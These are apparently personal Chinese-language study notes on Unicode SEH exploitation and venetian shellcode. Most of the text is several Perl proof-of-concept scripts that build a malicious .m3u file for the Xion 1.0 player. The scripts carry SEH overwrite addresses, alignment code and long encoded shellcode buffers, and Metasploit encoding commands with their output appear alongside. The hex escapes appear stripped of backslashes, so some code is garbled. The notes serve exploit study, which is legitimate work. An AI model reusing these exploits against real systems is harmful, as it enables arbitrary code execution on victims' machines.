unicode exp学习

UNICODE 会自动插入NULL字符

1）覆盖ret控制

寻找形似 0x00nn00mm 的 jmp xxx 的地址可以jmo 到shellcode执行

2）基于SEH 控制EIP+SHORT JMP

寻找 pop pop ret 不包含>7f 的入口地址用来覆盖SEH header

先将 nseh 置为 xccxcc 再来寻找两字节的 short jmp

3)基于SEH jmp

不用 short jmp 使用一些无害代码来覆盖NSEH 以使其能够执行到被覆写的SEH 结构之后，

然后再被执行代码放置于诶覆盖的SEH结构之后，这样跳过nseh + seh之后就执行我们的代码

需要如下

（1）无害指令放置在 nseh（2）“unicode compatible” 地址用来覆盖 seh hander ,并且执行它不会造成任何伤害

当 ASCii 码 >7f 时，unicode 转换后都会变为完全不同的值，eg:0x80 -> 1a20 -》可以构造成0x00nn1a20

ascii shellcode _> unicode shellcode:

1) 查找等效 ASCII并跳转到该：

ascii 被载入内存后，都会变为 unicode，因此在其中找到ascii版本的shellcode，如果能控制EIP 使其跳转到指定地址

那么就有可能实现exploit。如果无法到达，那么控制某一寄存器的内容，跳转到那个寄存器，放置一些跳转指令，使其跳转到ASCII版本的shellcode

2）编写自己的unicode-compatible shellcode

3）使用编码器

将ASCII-》unicode 并在其前端放上解码器，经解码后就可以生产原始代码并执行了

（1）通过特定的内存地址上重构原始代码，然后跳转到那个地址

其中某个寄存器必须指向 decoder+shellcode 的入口地址，另一个寄存器必须指向可写的内存地址（shellcode）

（2）通过改变代码执行流程，使其运行到重构的shellcode上

使用一个指向 decoder+shellcode的入口地址的寄存器即可，同时让原始shellcode经重构后保存在该处

工具学习：

1）makeunicode2.py 不会····

2）vense.pl 下载地址： http://www.phenoelit-us.org/win

生成一字节字符串，包含decoder+原始shellcode,,为了使用docoder,还需要设置寄存器

1个寄存器直接指向 buffer 入口地址用于存放vense.pl 生成的shellcode 2 个寄存器需要指向一段可写可执行的内存地址，能够向内写入数据

shellcode 入口地址 = eax 可写地址 = edi

改写 $secondstage 为 metasploit 生成的perl shellcode 并解码后可以正常执行

运行脚本 1）显示原始 shellcode 2）新生成的shellcode 包含decoder

将新生成shellcode放入 exploit 确保 eax->shellcode 入口地址！！！这里需要重新调整寄存器，并视同unicode-compatible代码实现跳转，方法点击这里，

寄存器设置好了之后，运行 jmp eax ，解码器就是提取出原始的shellcode 并执行它

注意：

（1）不能再不是UNIICODE EXP 上运用（2）虽然脚本中使用算法是经makeunicode2改善后的版本，但依然会生成很长的shellcode，所以要求的缓冲区很大

3）alpha2 下载地址： http://download.csdn.net/detail/hksoobe/4803452

同时也包含在 MSF中，将会把shellcode包裹在 decoder 之中

（1）只需要指定 shellcode入口的寄存器，唔需要指向可写可执行地址的寄存器

（2）decoder 并不包含在原来代码中，decoder可自我修改，而且要求的缓冲区空间也比较小

MSF中的没下载不用··························

root@bt:~/Desktop# ./alpha2 eax --unicode --uppercase < 1.bin

root@bt:~/Desktop# ./alpha2 --help
Usage: ./alpha2 [OPTION] [BASEADDRESS]
ALPHA 2 encodes your IA-32 shellcode to contain only alphanumeric characters.
The result can optionaly be uppercase-only and/or unicode proof. It is a encoded
version of your origional shellcode. It consists of baseaddress-code with some
padding, a decoder routine and the encoded origional shellcode. This will work
for any target OS. The resulting shellcode needs to have RWE-access to modify
it's own code and decode the origional shellcode in memory.

BASEADDRESS
  The decoder routine needs have it's baseaddress in specified register(s). The
  baseaddress-code copies the baseaddress from the given register or stack
  location into the apropriate registers.
eax, ecx, edx, ecx, esp, ebp, esi, edi
  Take the baseaddress from the given register. (Unicode baseaddress code using
  esp will overwrite the byte of memory pointed to by ebp!)
[esp], [esp-X], [esp+X]
  Take the baseaddress from the stack.
seh
  The windows "Structured Exception Handler" (seh) can be used to calculate
  the baseaddress automatically on win32 systems. This option is not available
  for unicode-proof shellcodes and the uppercase version isn't 100% reliable.
nops
  No baseaddress-code, just padding.  If you need to get the baseaddress from a
  source not on the list use this option (combined with --nocompress) and
  replace the nops with your own code. The ascii decoder needs the baseaddress
  in registers ecx and edx, the unicode-proof decoder only in ecx.
-n
  Do not output a trailing newline after the shellcode.
--nocompress
  The baseaddress-code uses "dec"-instructions to lower the required padding
  length. The unicode-proof code will overwrite some bytes in front of the
  shellcode as a result. Use this option if you do not want the "dec"-s.
--unicode
  Make shellcode unicode-proof. This means it will only work when it gets
  converted to unicode (inserting a '0' after each byte) before it gets
  executed.
--uppercase
  Make shellcode 100% uppercase characters, uses a few more bytes then
  mixedcase shellcodes.
--sources
  Output a list of BASEADDRESS options for the given combination of --uppercase
  and --unicode.
--help
  Display this help and exit
--version
  Output version information and exit

See the source-files for further details and copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

Acknowledgements:
  Thanks to rix for his phrack article on aphanumeric shellcode.
  Thanks to obscou for his phrack article on unicode-proof shellcode.
  Thanks to Costin Ionescu for the idea behind w32 SEH GetPC code.

Report bugs to <skylined@edup.tudelft.nl>

4） metasploit

root@bt:/opt/framework/msf3# ./msfpayload windows/exec  CMD=calc R |
> ./msfencode -e x86/alpha_mixed -t raw | 
> ./msfencode -e x86/unicode_upper BufferRegister=EAX -t perl
[*] x86/alpha_mixed succeeded with size 454 (iteration=1)

[*] x86/unicode_upper succeeded with size 1039 (iteration=1)

my $buf = 
"x50x50x59x41x49x41x49x41x49x41x49x41x51x41" .
"x54x41x58x41x5ax41x50x55x33x51x41x44x41x5a" .
"x41x42x41x52x41x4cx41x59x41x49x41x51x41x49" .
"x41x51x41x50x41x35x41x41x41x50x41x5ax31x41" . 省略····

1）只能有一套限定的指令集

2）避免NULL 字符，要求添加NULL后的shellcode仍然可正常运行

3）机器码对齐问题

venetian shellcode 技术

确保NULL和指令以正确的放上对齐

单字节转换为UNICODE编码时不被破坏寄存器或者指令还不行的话查看 http://phrack.org/issues/61/11.html#article

00 6e 00:add byte ptr [esi],ch
00 6f 00:add byte ptr [edi],ch
00 70 00:add byte ptr [eax],ch
00 71 00:add byte ptr [ecx],ch
00 72 00:add byte ptr [edx],ch
00 73 00:add byte ptr [ebx],ch
00 62 00:add byte ptr [edx],ah
00 6d 00:add byte ptr [ebp],ch

1）假设ESI 指向可写地址

假设 ASCII 版本的shellcode 在 0x33445566，eax 写入它 perl 脚本：

my $align = "xb8x44xaa"; #mov eax,0x0AA004400
$align=$align."x6e"; #nop/align nullbytes
$align=$align."x50"; #push eax
$align=$align."x6e"; #nop/align nullbytes
$align=$align."x4c"; #dec esp
$align=$align."x6e"; #nop/align nullbytes
$align=$align."x58"; #pop eax ,eax=0x004400??
$align=$align."x6e"; #nop/align nullbytes
$align=$align."x05x55x33"; #add eax,33005500h ,eax=0x334455??
$align=$align."x6e"; #nop/align nullbytes
$align=$align."xb0"; #mov al,0
#no alignment needed between these 2!
$align=$align."xb9x66xaa"; #mov ecx,AA006600h ,eax =0x33445500

$align=$align."xe8"; #add al,ch ,eax =0x33445566

#现在 ASCII 版本的shellcode 传入 unicode 编码的程序中执行上述指令，EAX 就可以被成功赋值为 0x33445566

#接下来就是 jmp eax

$align=$align."xe8"; #add al,ch ,eax =0x33445566

$align=$align."x6e"; #nop/align nullbytes

!!!注意这里有一个错误 0xc3 转换为unicode时不慎0xc3了

所以一般直接走到shellcode

但是 http://bbs.pediy.com/showthread.php?t=126344

说的有可能构造出 c3

'x72xcbx72'  #ret 转换成'x72x00xc3x85x41x00'

2）假设 ebp+0x100 放入eax 之后调到EAX 去执行代码，那么就先写入一些汇编指令

00401580 >    55            push ebp
00401581      58            pop eax
00401582      05 00140011   add eax,0x11001400
00401587      2D 00130011   sub eax,0x11001300  EBP+0x100

利用 venetian shellcode 技术构造以上代码

x6e #nop/align nullbytes

x55 #push ebp

x6e #nop/align nullbytes

x58 #pop eax

x6e #nop/align nullbytes

x05x14x11 #add eax,0x11001400

x6e #nop/align nullbytes

x2dx13x11 #sub eax,0x11001300

x6e #nop/align nullbytes

这里准备一个例子： xion 1.0 build120：

用OD调试出来是 0x235

然后

!pvefindaddr p2

#Found pop esi - pop ebx - ret at 0x0043003B [xion.exe] ** Unicode compatible ** ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **] - C:Program Files 2 StudiosXionXion.exe
#Found pop esi - pop ebp - ret at 0x00470034 [xion.exe] ** Unicode compatible ** ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **] - C:Program Files 2 StudiosXionXion.exe
#Found pop edi - pop esi - ret at 0x00480063 [xion.exe] ** Unicode compatible ** ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **] - C:Program Files 2 StudiosXionXion.exe

不能要 >7f 的字节

这里选择 0x00470034

下来这个是WINDBG找出来的，还不算成功呢调试才能成功运行shellcode

my $file = "test.m3u";
#my $junk = "A"x270;


my $nseh = "x61x62";#61 is popad 62为align bytes
my $seh =  "x34x47";#"x34x47";pop pop ret
#Found pop esi - pop ebx - ret at 0x0043003B [xion.exe] ** Unicode compatible **  ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **]  - C:Program Files
2 StudiosXionXion.exe
#Found pop esi - pop ebp - ret at 0x00470034 [xion.exe] ** Unicode compatible **  ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **]  - C:Program Files
2 StudiosXionXion.exe
#Found pop edi - pop esi - ret at 0x00480063 [xion.exe] ** Unicode compatible **  ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **]  - C:Program Files
2 StudiosXionXion.exe


my $VenetianShellcode ="x6e";
 $VenetianShellcode =$VenetianShellcode."x55";#55            push ebp
 $VenetianShellcode =$VenetianShellcode."x6e";
 $VenetianShellcode =$VenetianShellcode."x58";#58            pop eax
 $VenetianShellcode =$VenetianShellcode."x6e";
 $VenetianShellcode =$VenetianShellcode."x05x14x11";#05 00140011   add eax,0x11001400
 $VenetianShellcode =$VenetianShellcode."x6e";
 $VenetianShellcode =$VenetianShellcode."x2dx13x11";#2D 00130011   sub eax,0x11001300  EBP+0x100
 $VenetianShellcode =$VenetianShellcode."x6e";
#229fe54 - 229fd76 = DE = 222  just need 111  不能用push eax ret  c3不能正确转换为c3

                         #1)"x43x6e" inc ebx ,add byte ptr [esi],ch 
my $junk2  = "x70"x111; #2)"x70"   jo xxx   1,2都可以用来作为nop来对齐地址为eax ,指向shellcode第一字节
#缓冲区为 1840bits  从这里开始   而shellcode为 1037bits *2 = 2074  所以shellcode分为两段
my $buf = 
"x50x50x59x41x49x41x49x41x49x41x49x41x51x41" .
"x54x41x58x41x5ax41x50x55x33x51x41x44x41x5a" .
"x41x42x41x52x41x4cx41x59x41x49x41x51x41x49" .
"x41x51x41x50x41x35x41x41x41x50x41x5ax31x41" .
"x49x31x41x49x41x49x41x4ax31x31x41x49x41x49" .
"x41x58x41x35x38x41x41x50x41x5ax41x42x41x42" .
"x51x49x31x41x49x51x49x41x49x51x49x31x31x31" .
"x31x41x49x41x4ax51x49x31x41x59x41x5ax42x41" .
"x42x41x42x41x42x41x42x33x30x41x50x42x39x34" .
"x34x4ax42x43x59x5ax42x49x49x58x4bx5ax39x52" .
"x52x4bx44x52x39x51x39x51x39x51x39x51x39x51" .
"x39x51x39x50x49x51x39x51x39x51x39x50x49x51" .
"x33x50x43x50x43x51x33x51x33x51x33x50x37x50" .
"x51x50x5ax52x4ax51x31x50x58x52x30x50x30x51" .
"x31x50x30x51x31x52x4bx51x31x51x31x52x31x50" .
"x32x51x31x51x32x50x32x50x42x51x32x50x30x51" .
"x32x51x32x51x31x50x42x52x38x50x50x50x38x51" .
"x31x51x32x43x45x50x4ax50x49x50x49x52x4cx50" .
"x58x43x38x50x4bx50x39x51x37x54x30x50x43x50" .
"x30x50x45x52x30x52x31x54x30x50x4cx51x39x50" .
"x4dx50x35x52x30x50x31x52x38x51x42x51x33x52" .
"x34x50x4ex52x4bx50x50x52x32x50x56x50x50x50" .
"x4cx50x4bx52x32x52x52x52x34x50x4cx50x4ex52" .
"x4bx52x30x51x42x50x56x43x44x50x4cx50x4bx50" .
"x50x43x42x50x51x50x38x51x46x52x4fx50x4dx52" .
"x47x50x43x43x4ax52x36x50x46x50x56x52x31x50" .
"x49x52x4fx50x56x50x51x50x4bx52x50x50x4cx52" .
"x4cx51x35x52x4cx50x51x52x51x50x51x52x4cx52" .
"x34x51x32x51x46x50x4cx50x45x52x50x50x4bx52" .
"x51x52x38x50x4fx50x56x52x4dx51x33x50x31x51" .
"x48x51x37x50x4dx50x32x50x5ax52x30x52x36x50" .
"x32x50x52x54x37x50x4ex52x4bx52x31x51x32x50" .
"x56x52x50x50x4cx50x4bx50x52x43x32x51x35x52" .
"x4cx51x35x52x31x50x58x50x50x50x4cx50x4bx50" .
"x43x52x50x52x31x51x58x50x4fx52x55x50x4bx54" .
"x30x52x31x43x34x51x33x52x5ax51x46x51x51x50" .
"x5ax52x50x51x46x50x30x50x4cx50x4bx50x43x54" .
"x38x50x56x43x48x50x4ex52x4bx50x50x50x58x50" .
"x51x50x30x51x37x54x31x50x4bx51x53x51x39x52" .
"x53x50x47x50x4cx50x52x43x39x50x4cx50x4bx51" .
"x35x43x34x50x4cx50x4bx50x47x54x31x50x5ax54" .
"x36x50x45x43x31x51x39x52x4fx50x50x50x31x50" .
"x4bx52x50x50x4cx52x4cx50x5ax43x31x52x38x50" .
"x4fx51x44x50x4dx51x33x50x31x52x38x50x47x50" .
"x47x51x38x50x4bx50x50x52x30x43x45x50x5ax50" .
"x54x50x56x43x33x50x43x50x4dx50x58x54x38x50" .
"x47x50x4bx52x31x52x4dx51x35x43x44x52x34x50" .
"x35x50x5ax50x42x51x46x50x38x50x4ex52x4bx52" .
"x36x50x38x51x46x51x34x51x37x54x31x51x4ax54" .
"x33x50x50x52x46x50x4cx50x4bx50x54x50x4cx52" .
"x30x50x4bx50x4ex52x4bx50x56x50x38x51x35x50" .
"x4cx50x47x52x51x51x48x50x53x50x4ex52x4bx50" .
"x47x54x34x50x4cx50x4bx51x46x51x51x52x38x52" .
"x30x50x4fx54x39x52x30x51x34x50x47x52x34x50" .
"x54x43x34x50x43x52x4bx52x31x50x4bx50x51x54" .
"x31x52x30x50x59x50x50x50x5ax51x33x43x31x51" .
"x39x52x4fx50x4bx52x30x50x50x52x38x51x33x52" .
"x4fx51x42x52x5ax50x4ex52x4bx50x45x50x42x51" .
"x48x52x4bx50x4ex52x46x52x31x50x4dx52x30x51" .
"x5ax51x33x50x31x50x4cx50x4dx50x4ex52x45x50" .
"x4ex50x59x50x47x52x50x50x45x52x30x50x45x50" .
"x50x50x56x50x30x50x45x50x38x52x34x54x31x50" .
"x4ex52x4bx52x32x50x4fx50x4cx50x47x50x4bx50" .
"x4fx50x58x50x55x50x4dx52x4bx51x48x52x50x50" .
"x4ex50x55x50x4ex50x42x51x42x43x46x51x33x51" .
"x48x51x39x50x36x50x4dx50x45x50x4dx52x4dx50" .
"x4fx52x4dx50x4bx50";

#junk 
my $junk = 
"x4fx50x4bx51x55x50x45x52" .
"x4cx51x33x50x36x50x51x52x4cx52x36x51x5ax50" .
"x4fx54x30x50x4bx50x4bx50x4bx52x30x52x32x52" .
"x35x51x37x52x55x50x4fx50x4bx52x31x50x57x52" .
"x32x50x33x50x50x43x42x50x50x52x4fx51x42x50" .
"x4ax51x35x52x30x50x56x50x33x51x39x52x4fx51" .
"x39x51x35x50x45x50x33x50x51x54x31x52x30x52" .
"x4cx50x43x50x53x51x35x52x30x51x31x51x31x41" .
"x41";
$junk = $junk."A"x(270-length($junk));

my $junk3 = "x42"x(5000-length($junk.$nseh.$seh.$VenetianShellcode.$junk2.$buf));

my $payload = $junk.$nseh.$seh.$VenetianShellcode.$junk2.$buf.$junk3;
open($FILE,">$file");  
print $FILE $payload;  
close($FILE);

运用自己的shellcode 加密成为 unicode 能用的shellcode

root@bt:/opt/framework/msf3# cat exploit.m3u |   ./msfencode -e x86/alpha_mixed -t raw |    ./msfencode -e x86/unicode_upper BufferRegister=EAX -t perl
[*] x86/alpha_mixed succeeded with size 277 (iteration=1)


[*] x86/unicode_upper succeeded with size 685 (iteration=1)


my $buf = 
"x50x50x59x41x49x41x49x41x49x41x49x41x51x41" .···省略

下面这个才是正确的 POC 问题在于： windbg和OD（正常）的调试出来的POC不一样这是怎么一回事呢

而且windbg调试出来的POC 肯定是错误的！ OD调试出来的才是正确的

1）寻找 unicode 形式的 pop pop ret 覆盖 SEH handler !pvefindaddr p2 可以找到

2） nseh 用 popad 可以得到寄存器+偏移指向我们输入的字符串某一位置

3）构造 VenetianShllcode 使得 eax = 我们输入的字符串某一位置

4）构造 nop/align 得到 eax= shellcode起始第一字节

5）用生成的unicode shellcode ， eax = shellcode起始，执行shellcode shellcode = 解码器+代码

my $file = "test.m3u";#perl
#my $junk = "A"x270;


my $nseh = "x61x62";#61 is popad 62为align bytes
my $seh =  "x34x47";#"x34x47";pop pop ret
#Found pop esi - pop ebx - ret at 0x0043003B [xion.exe] ** Unicode compatible **  ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **]  - C:Program Files
2 StudiosXionXion.exe
#Found pop esi - pop ebp - ret at 0x00470034 [xion.exe] ** Unicode compatible **  ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **]  - C:Program Files
2 StudiosXionXion.exe
#Found pop edi - pop esi - ret at 0x00480063 [xion.exe] ** Unicode compatible **  ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **]  - C:Program Files
2 StudiosXionXion.exe


my $VenetianShellcode ="x6e";
 $VenetianShellcode =$VenetianShellcode."x55";#55            push ebp
 $VenetianShellcode =$VenetianShellcode."x6e";
 $VenetianShellcode =$VenetianShellcode."x58";#58            pop eax
 $VenetianShellcode =$VenetianShellcode."x6e";
 $VenetianShellcode =$VenetianShellcode."x05x14x11";#05 00140011   add eax,0x11001400
 $VenetianShellcode =$VenetianShellcode."x6e";
 $VenetianShellcode =$VenetianShellcode."x2dx13x11";#2D 00130011   sub eax,0x11001300  EBP+0x100
 $VenetianShellcode =$VenetianShellcode."x6e";
#229fe54 - 229fd76 = DE = 222  just need 111  不能用push eax ret  c3不能正确转换为c3

my $junk2  =  "x48x6e"x42;               #1)"x43x6e" inc ebx ,add byte ptr [esi],ch 
 $junk2  = $junk2."x70"x6; #2)"x70"   jo xxx   1,2都可以用来作为nop来对齐地址为eax ,指向shellcode第一字节
#缓冲区为 1840bits  从这里开始   而shellcode为 1037bits *2 = 2074  所以shellcode分为两段
my $buf = 
"x50x50x59x41x49x41x49x41x49x41x49x41x51x41" .
"x54x41x58x41x5ax41x50x55x33x51x41x44x41x5a" .
"x41x42x41x52x41x4cx41x59x41x49x41x51x41x49" .
"x41x51x41x50x41x35x41x41x41x50x41x5ax31x41" .
"x49x31x41x49x41x49x41x4ax31x31x41x49x41x49" .
"x41x58x41x35x38x41x41x50x41x5ax41x42x41x42" .
"x51x49x31x41x49x51x49x41x49x51x49x31x31x31" .
"x31x41x49x41x4ax51x49x31x41x59x41x5ax42x41" .
"x42x41x42x41x42x41x42x33x30x41x50x42x39x34" .
"x34x4ax42x45x39x5ax46x58x59x58x4ex58x59x54" .
"x36x4bx44x50x59x51x39x50x49x50x49x51x39x51" .
"x39x51x39x50x49x50x49x50x49x51x39x51x39x51" .
"x33x51x33x50x43x51x33x50x43x51x33x50x37x50" .
"x51x51x4ax52x4ax51x31x52x38x52x30x50x30x51" .
"x31x50x30x51x31x52x4bx51x31x51x31x50x51x50" .
"x32x51x31x51x32x50x32x51x32x51x32x50x30x51" .
"x32x51x32x51x31x50x42x51x48x52x30x50x38x51" .
"x31x50x42x43x45x50x4ax51x39x52x30x50x31x50" .
"x5ax52x52x51x48x50x32x50x54x54x30x52x32x51" .
"x34x50x4ex52x4bx51x44x52x32x50x4cx50x4bx50" .
"x51x51x32x52x36x52x4cx50x4cx50x4bx51x33x51" .
"x52x51x37x52x4cx50x4ex52x4bx50x51x50x52x50" .
"x47x43x48x50x4ex52x4bx52x34x50x32x50x47x50" .
"x50x50x4cx50x4bx52x36x54x32x50x4fx52x50x50" .
"x51x52x4ex50x56x52x4cx51x35x43x33x52x34x50" .
"x35x51x39x52x42x50x4cx50x49x52x38x51x37x50" .
"x43x50x33x50x51x51x58x50x47x50x4cx50x4cx50" .
"x4bx52x30x50x57x52x32x50x58x50x45x50x51x50" .
"x4fx50x32x50x4ex52x4bx50x51x52x4ax51x37x50" .
"x50x51x35x50x51x50x4bx43x47x52x34x52x51x52" .
"x38x52x4dx50x4cx50x4bx51x35x52x44x50x4ex50" .
"x4fx50x43x50x31x50x4bx54x36x50x52x52x45x50" .
"x4fx54x31x51x37x50x4ex51x37x50x36x52x30x51" .
"x51x52x31x52x44x51x35x50x31x52x34x50x35x50" .
"x49x43x32x50x4bx50x31x52x31x52x4ex50x54x50" .
"x48x51x37x50x35x52x30x43x48x52x30x43x39x51" .
"x42x51x44x52x30x52x55x50x58x52x49x50x4ex52" .
"x4bx50x43x50x4ax51x44x52x44x51x33x50x31x50" .
"x4fx50x37x50x50x43x36x50x4ex52x4bx51x46x50" .
"x4cx52x30x52x4fx50x4cx50x4bx51x33x50x4ax50" .
"x47x52x4cx50x45x50x51x50x4fx50x37x50x4cx50" .
"x4bx50x43x50x4cx50x4ex50x4fx51x39x52x4cx51" .
"x46x43x31x51x48x50x47x50x52x51x38x50x43x51" .
"x44x50x43x50x51x50x43x52x50x51x37x54x31x52" .
"x30x43x38x50x47x50x30x50x54x50x30x51x35x50" .
"x31x50x52x50x4ex50x4bx50x39x50x4dx50x31x50" .
"x4bx50x4ex52x32x43x39x50x45x50x57x51x44x54" .
"x31x50x4bx54x30x50x56x50x31x52x30x50x50x50" .
"x4bx50x4fx50x5ax54x37x51x31x51x31x41x41";

#junk 
$junk = "A"x235;

my $junk3 = "x42"x(5000-length($junk.$nseh.$seh.$VenetianShellcode.$junk2.$buf));

my $payload = $junk.$nseh.$seh.$VenetianShellcode.$junk2.$buf.$junk3;
open($FILE,">$file");  
print $FILE $payload;  
close($FILE);

下面构造 unicode 版本的 egg hunting egg hunting 可以解决字符不够用的情况，将会覆盖 shellcode到其他地方然后去找寻执行

构造shellcode

root@xxx:/opt/framework/msf3# ./msfpayload windows/messagebox TEXT="#pand0#" TITLE="#pand0#" R > /root/Desktop/1.bin

···········································

root@bt:~/Desktop# ./alpha2 eax --unicode --uppercase < 1.bin
PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1A`````````````````````````

my $file = "test.m3u";#perl  
#my $junk = "A"x270;  
  
  
my $nseh = "x61x62";#61 is popad 62为align bytes  
my $seh =  "x34x47";#"x34x47";pop pop ret  
#Found pop esi - pop ebx - ret at 0x0043003B [xion.exe] ** Unicode compatible **  ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **]  - C:Program Files
2 StudiosXionXion.exe  
#Found pop esi - pop ebp - ret at 0x00470034 [xion.exe] ** Unicode compatible **  ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **]  - C:Program Files
2 StudiosXionXion.exe  
#Found pop edi - pop esi - ret at 0x00480063 [xion.exe] ** Unicode compatible **  ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **]  - C:Program Files
2 StudiosXionXion.exe  
  
  
my $VenetianShellcode ="x6e";  
 $VenetianShellcode =$VenetianShellcode."x55";#55            push ebp  
 $VenetianShellcode =$VenetianShellcode."x6e";  
 $VenetianShellcode =$VenetianShellcode."x58";#58            pop eax  
 $VenetianShellcode =$VenetianShellcode."x6e";  
 $VenetianShellcode =$VenetianShellcode."x05x14x11";#05 00140011   add eax,0x11001400  
 $VenetianShellcode =$VenetianShellcode."x6e";  
 $VenetianShellcode =$VenetianShellcode."x2dx13x11";#2D 00130011   sub eax,0x11001300  EBP+0x100  
 $VenetianShellcode =$VenetianShellcode."x6e";  
#229fe54 - 229fd76 = DE = 222  just need 111  不能用push eax ret  c3不能正确转换为c3  
  
my $junk2  =  "x48x6e"x42;               #1)"x43x6e" inc ebx ,add byte ptr [esi],ch   
 $junk2  = $junk2."x70"x6; #2)"x70"   jo xxx   1,2都可以用来作为nop来对齐地址为eax ,指向shellcode第一字节  
#缓冲区为 1840bits  从这里开始   而shellcode为 1037bits *2 = 2074  所以shellcode分为两段  
my $egghunter = 
"PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBQVU1XJKOLOQ2R2QZLB0X8MNNOLM5QJ44JO6XM0P0KPT44KKJ6O45IZFO3EJGKOIWA";
#egg 用 x00x30x00x74
$junk2 = $junk2.$egghunter;
my $garbage = "X"x100; #########################################################垃圾代码############################################

my $aligin = "x6d".
"x57".  #push edi
"x6d".
"x58".  #pop eax
"x6d".
"x05x14x11".#05 00140011   add eax,0x11001400  
"x6d".
"x2dx13x11".#2D 00130011   sub eax,0x11001300  eax+0x100  
"x6d".  
"x40".  #inc eax
"x6d".
"x70"x113;#注意相加减得到的差 要除2 

my $buf =("PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBYIZKUKXYRTMTJTNQZ27BSGNQ8I34TKD1NPDK46LLDKRVML4KQ6LHTK3NO04KNVOHPOMHBUL3PYKQXQKO9QQP4K2LMTO4TKPEOL4K1DMXBXM1ZJ4KOZN84KPZMPKQJKK3P4Q9DKNT4KKQZNNQKONQY0KLVLU47PBTKWWQXOLMM1WWJKJTOK3LNDMX459QDK1JMTM1JK36TKLL0KDKQJMLM1ZKTKLDTKKQJHTIOTO4MLQQ8C7BLHMYHTSYK5E9WRS8TN0NLNZL22IXUOKOKOKOU9OULDWKCNIHZB3CTGMLMT22YXDNKOKOKOU9PEKXBH2LBLO011RHP3P2NN1TQXRU2SC52R4H1LO4KZ3YJFPVKO25KTE98B20WKUX6B0MWL4GMLND229X1QKOKOKO1X1TP0MSQHQXMS2P1QBNNQIKCX1LO4KW4IYSQX1T00MS28QXNC2P1Q2NNQI9THPLNDKWCYYQNQZ21BPSR1PRKOXPNQWPB0KO0ULHA");
#panda0#
$junk = "A"x235;   

my $junk3 = "x42"x(5000-length($junk.$nseh.$seh.$VenetianShellcode.$junk2.$garbage."0t0t".$aligin.$buf));  
  
my $payload = $junk.$nseh.$seh.$VenetianShellcode.$junk2.$garbage."0t0t".$aligin.$buf.$junk3;  
open($FILE,">$file");    
print $FILE $payload;    
close($FILE);